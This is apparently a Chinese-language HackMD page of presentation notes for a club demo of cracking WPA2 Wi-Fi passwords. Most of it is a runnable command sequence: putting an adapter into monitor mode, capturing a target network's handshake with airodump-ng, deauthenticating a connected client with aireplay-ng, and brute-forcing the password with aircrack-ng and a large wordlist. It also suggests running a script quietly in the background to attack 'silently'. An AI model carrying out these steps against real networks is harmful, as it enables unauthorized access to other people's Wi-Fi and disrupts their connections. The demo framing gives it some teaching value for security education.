Author: Junner
Date: 12/05/2024
Code: https://github.com/HackerSir/My-Waifu-Is-Not-Safe
Description: HackMd
簡報:https://hackmd.io/@JunnerX/My-Waifu-Is-Not-Safe-Presentation
虛擬機:
帳號:kali
密碼:kali
筆電:帳密在筆電底下
用 root 權限執行 script,密碼是
kali
。
檔案在~\Desktop\nets\atker\
,名稱sub_process_3.py
。
結果會輸出到passwords
裡面,找到 KEY FOUND! [ 1234567890 ],那密碼就是 1234567890
打開 managed mode 與測試
ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0
aireplay-ng --test wlan0
獲得目標的 MAC 與 ACK
airodump-ng --essid OppOppOppO wlan0
airodump-ng --bssid 62:08:7D:D1:49:87 -w /home/kali/Desktop/nets/test1/ wlan0
在這裡開一個新的終端機,執行
aireplay-ng -0 30 -a 62:08:7D:D1:49:87 -c 5A:D4:F9:B3:3F:B1 wlan0
爆破密碼
aircrack-ng -a2 -b 62:08:7D:D1:49:87 -w /home/kali/Desktop/passwords/10-million-password-list-top-1000000.txt /home/kali/Desktop/nets/test1/*.cap
運行 VMware Workstation
當 usb 裝置插入時,這個視窗將會彈出。選擇 Connect to Virtual machine
> 選擇目標虛擬機器。
OK
執行 iwconfig
,會看到該裝置。
如果你透過執行「lsusb」看到該設備名稱,但沒有看到它出現在「iwconfig」中,請重複執行上述步驟,或檢查下方的網路設定。如果執行了多次但仍看不到該設備,可以嘗試重新啟動虛擬機器。
設定方式:
Tabs
>
Edit
> Virtual Network Editor
不需要 bridge
VM
> Settings
> Network Adapter
通常 usb 裝置名稱會識別為 VMnet0
這樣設定就完成了。享受你的攻擊之旅吧!
首先,終端機要開啟 root 權限,密碼是 kali
。
為了攻擊,需要為 usb 裝置打開 monitor mode
ifconfig wlan0 down
運行這個後,設備將會連不到網路。
airmon-ng check kill
iwconfig wlan0 mode monitor
如果看到警告,無視他就好。
ifconfig wlan0 up
airmon-ng start wlan0
為了測試 monitor mode 已經成功啟用:
aireplay-ng --test wlan0
如果看到「Injection is working!」,那就是成功了。
airmon-ng stop wlan0
ifconfig wlan0 down
因為你關閉了網路管理員,要恢復的話就跑:
service NetworkManager restart
假設攻擊目標的 wifi 名稱為 OppOppOppO
.
airodump-ng --essid OppOppOppO wlan0
BSSID
的下方就是目標的 MAC。 Ctrl+C
中斷程式並複製 62:08:7D:D1:49:87
airodump-ng --bssid 62:08:7D:D1:49:87 -c 1 -w /home/kali/Desktop/nets/test1 wlan0
檔案會儲存在 /home/kali/Desktop/nets/
,並有著 test1
的前綴。
等待 5 至 30 秒,STATION
的下方將會出現一些地址。
開啟另外一個終端機,而上一個執行的指令必須還在執行中,毋須關閉。
aireplay-ng -0 20 -a 62:08:7D:D1:49:87 -c 5A:D4:F9:B3:3F:B1 wlan0
ACK 的副檔名是 .cap
。通常最新的檔案的名稱會包含著最大的數字。
然後!爆破!
aircrack-ng -a2 -b 62:08:7D:D1:49:87 -w /home/kali/Desktop/passwords/10-million-password-list-top-1000000.txt /home/kali/Desktop/nets/test1*.cap
而結果會在 passwords
裡面: KEY FOUND! [ 1234567890 ]
基本上大部分情況都會被處理,如果還是爆開就…用上面的指令打,因為用上面的指令還比較有展示性一點,但如果用 script 就能悄悄的攻擊,兩種不一樣的方式。
所以如果可以的話,先問他們 wifi 名稱,放到 script 裡面讓他背景執行。如果真的不行的話再手動打,現場展示。
基本上會改的部分就是 target
、file_path
、passwordSet_path
。
主要:
target
:要攻擊的目標名稱。(這次預設為 OppOppOppO
)其他還有像是:(通常不會動)
file_path
:要儲存的檔案路徑。passwordSet_path
:密碼集文字檔的所在地。or
or
By clicking below, you agree to our terms of service.
New to HackMD? Sign up
Syntax | Example | Reference | |
---|---|---|---|
# Header | Header | 基本排版 | |
- Unordered List |
|
||
1. Ordered List |
|
||
- [ ] Todo List |
|
||
> Blockquote | Blockquote |
||
**Bold font** | Bold font | ||
*Italics font* | Italics font | ||
~~Strikethrough~~ | |||
19^th^ | 19th | ||
H~2~O | H2O | ||
++Inserted text++ | Inserted text | ||
==Marked text== | Marked text | ||
[link text](https:// "title") | Link | ||
 | Image | ||
`Code` | Code |
在筆記中貼入程式碼 | |
```javascript var i = 0; ``` |
|
||
:smile: | ![]() |
Emoji list | |
{%youtube youtube_id %} | Externals | ||
$L^aT_eX$ | LaTeX | ||
:::info This is a alert area. ::: |
This is a alert area. |
On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?
Please give us some advice and help us improve HackMD.
Syncing